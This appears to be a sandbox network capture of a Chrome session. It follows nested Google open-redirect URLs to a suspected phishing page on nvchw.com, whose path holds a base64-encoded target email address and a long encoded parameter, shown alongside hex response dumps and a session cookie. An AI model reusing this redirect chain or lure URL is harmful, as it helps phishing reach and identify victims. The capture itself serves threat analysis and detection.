                                                                  2025-01-13 21:37:14 UTC2279OUTGET /url?q=https://www.google.com/url?q=https://www.google.com/url?q=.////amp/s/nvchw.com/winner/1dsbr/cmxhbXByb3NAb2Zzb3B0aWNzLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6Zndzd [TRUNCATED]
                                                                  Host: www.google.com
                                                                  Connection: keep-alive
                                                                  Upgrade-Insecure-Requests: 1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: navigate
                                                                  Sec-Fetch-User: ?1
                                                                  Sec-Fetch-Dest: document
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: NID=520=g-PPRcdlH3h6OszxCLUJmdxJxzb9DU2r7WPIpar31-6Llmgu4pZehPYCoyBCpP1aG2SflvTb4-SwNgUgMzbR5LvoP7UrD4hQ7MiTuX_C9y7PPyKtbQH4KUidPwnCAR4A1r-NZXFt-Zf-RsgJDMTu265zRQonxW8o4hL2kqyg89W_8qZhACh8qL5FB2A2TD6ET28ieBO4_w
                                                                  2025-01-13 21:37:14 UTC1969INHTTP/1.1 302 Found
                                                                  Location: https://www.google.com/url?q=https://www.google.com/url?q=.////amp/s/nvchw.com/winner/1dsbr/cmxhbXByb3NAb2Zzb3B0aWNzLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6Zndzdn [TRUNCATED]
                                                                  Cache-Control: private
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-3gWoTmpLV9iRi5N0M1pNxw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                  Permissions-Policy: unload=()
                                                                  Date: Mon, 13 Jan 2025 21:37:14 GMT
                                                                  Server: gws
                                                                  Content-Length: 1593
                                                                  X-XSS-Protection: 0
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close
                                                                  2025-01-13 21:37:14 UTC1593INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 72 6c 3f 71 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 72 6c 3f 71 3d 2e 2f 2f 2f 2f 61 6d 70 2f 73 2f 6e 76 63 68 77 2e 63 6f 6d 2f 77 69 6e 6e 65 72 2f 31
                                                                  Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/url?q=https://www.google.com/url?q=.////amp/s/nvchw.com/winner/1


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.1649714142.250.185.1324437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:15 UTC2250OUTGET /url?q=https://www.google.com/url?q=.////amp/s/nvchw.com/winner/1dsbr/cmxhbXByb3NAb2Zzb3B0aWNzLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dH [TRUNCATED]
                                                                  Host: www.google.com
                                                                  Connection: keep-alive
                                                                  Upgrade-Insecure-Requests: 1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: navigate
                                                                  Sec-Fetch-User: ?1
                                                                  Sec-Fetch-Dest: document
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: NID=520=g-PPRcdlH3h6OszxCLUJmdxJxzb9DU2r7WPIpar31-6Llmgu4pZehPYCoyBCpP1aG2SflvTb4-SwNgUgMzbR5LvoP7UrD4hQ7MiTuX_C9y7PPyKtbQH4KUidPwnCAR4A1r-NZXFt-Zf-RsgJDMTu265zRQonxW8o4hL2kqyg89W_8qZhACh8qL5FB2A2TD6ET28ieBO4_w
                                                                  2025-01-13 21:37:15 UTC1940INHTTP/1.1 302 Found
                                                                  Location: https://www.google.com/url?q=.////amp/s/nvchw.com/winner/1dsbr/cmxhbXByb3NAb2Zzb3B0aWNzLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHR [TRUNCATED]
                                                                  Cache-Control: private
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-r1XTrmpSJi9A5vhePPKGmA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                  Permissions-Policy: unload=()
                                                                  Date: Mon, 13 Jan 2025 21:37:15 GMT
                                                                  Server: gws
                                                                  Content-Length: 1564
                                                                  X-XSS-Protection: 0
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close
                                                                  2025-01-13 21:37:15 UTC1564INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 72 6c 3f 71 3d 2e 2f 2f 2f 2f 61 6d 70 2f 73 2f 6e 76 63 68 77 2e 63 6f 6d 2f 77 69 6e 6e 65 72 2f 31 64 73 62 72 2f 63 6d 78 68 62 58 42 79 62 33 4e 41 62 32 5a 7a 62 33 42 30 61 57 4e 7a
                                                                  Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/url?q=.////amp/s/nvchw.com/winner/1dsbr/cmxhbXByb3NAb2Zzb3B0aWNz


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.1649717142.250.185.1324437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:15 UTC2221OUTGET /url?q=.////amp/s/nvchw.com/winner/1dsbr/cmxhbXByb3NAb2Zzb3B0aWNzLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZ [TRUNCATED]
                                                                  Host: www.google.com
                                                                  Connection: keep-alive
                                                                  Upgrade-Insecure-Requests: 1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: navigate
                                                                  Sec-Fetch-User: ?1
                                                                  Sec-Fetch-Dest: document
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: NID=520=g-PPRcdlH3h6OszxCLUJmdxJxzb9DU2r7WPIpar31-6Llmgu4pZehPYCoyBCpP1aG2SflvTb4-SwNgUgMzbR5LvoP7UrD4hQ7MiTuX_C9y7PPyKtbQH4KUidPwnCAR4A1r-NZXFt-Zf-RsgJDMTu265zRQonxW8o4hL2kqyg89W_8qZhACh8qL5FB2A2TD6ET28ieBO4_w
                                                                  2025-01-13 21:37:16 UTC1932INHTTP/1.1 302 Found
                                                                  Location: https://www.google.com////amp/s/nvchw.com/winner/1dsbr/cmxhbXByb3NAb2Zzb3B0aWNzLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzM [TRUNCATED]
                                                                  Cache-Control: private
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-5a4FCQ2gNki5DxOBlFKjRQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                  Permissions-Policy: unload=()
                                                                  Date: Mon, 13 Jan 2025 21:37:16 GMT
                                                                  Server: gws
                                                                  Content-Length: 1556
                                                                  X-XSS-Protection: 0
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close
                                                                  2025-01-13 21:37:16 UTC1556INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 2f 2f 2f 61 6d 70 2f 73 2f 6e 76 63 68 77 2e 63 6f 6d 2f 77 69 6e 6e 65 72 2f 31 64 73 62 72 2f 63 6d 78 68 62 58 42 79 62 33 4e 41 62 32 5a 7a 62 33 42 30 61 57 4e 7a 4c 6d 4e 76 62 51 3d 3d
                                                                  Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com////amp/s/nvchw.com/winner/1dsbr/cmxhbXByb3NAb2Zzb3B0aWNzLmNvbQ==


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.1649718142.250.185.1324437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:16 UTC2213OUTGET ////amp/s/nvchw.com/winner/1dsbr/cmxhbXByb3NAb2Zzb3B0aWNzLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCY [TRUNCATED]
                                                                  Host: www.google.com
                                                                  Connection: keep-alive
                                                                  Upgrade-Insecure-Requests: 1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: navigate
                                                                  Sec-Fetch-User: ?1
                                                                  Sec-Fetch-Dest: document
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: NID=520=g-PPRcdlH3h6OszxCLUJmdxJxzb9DU2r7WPIpar31-6Llmgu4pZehPYCoyBCpP1aG2SflvTb4-SwNgUgMzbR5LvoP7UrD4hQ7MiTuX_C9y7PPyKtbQH4KUidPwnCAR4A1r-NZXFt-Zf-RsgJDMTu265zRQonxW8o4hL2kqyg89W_8qZhACh8qL5FB2A2TD6ET28ieBO4_w
                                                                  2025-01-13 21:37:17 UTC877INHTTP/1.1 302 Found
                                                                  Location: https://nvchw.com/winner/1dsbr/cmxhbXByb3NAb2Zzb3B0aWNzLmNvbQ==
                                                                  Cache-Control: private
                                                                  X-Robots-Tag: noindex
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-sO4XoH1Liy_vpjC1dSyKuQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                  Permissions-Policy: unload=()
                                                                  Date: Mon, 13 Jan 2025 21:37:17 GMT
                                                                  Server: gws
                                                                  Content-Length: 260
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close
                                                                  2025-01-13 21:37:17 UTC260INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 6e 76 63 68 77 2e 63 6f 6d 2f 77 69 6e 6e 65 72 2f 31 64 73 62 72 2f 63 6d 78 68 62 58 42 79 62 33 4e 41 62 32 5a 7a 62 33 42 30 61 57 4e 7a 4c 6d 4e 76 62 51 3d 3d 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54
                                                                  Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://nvchw.com/winner/1dsbr/cmxhbXByb3NAb2Zzb3B0aWNzLmNvbQ==">here</A>.</BODY></HT


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.1649720103.83.194.554437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
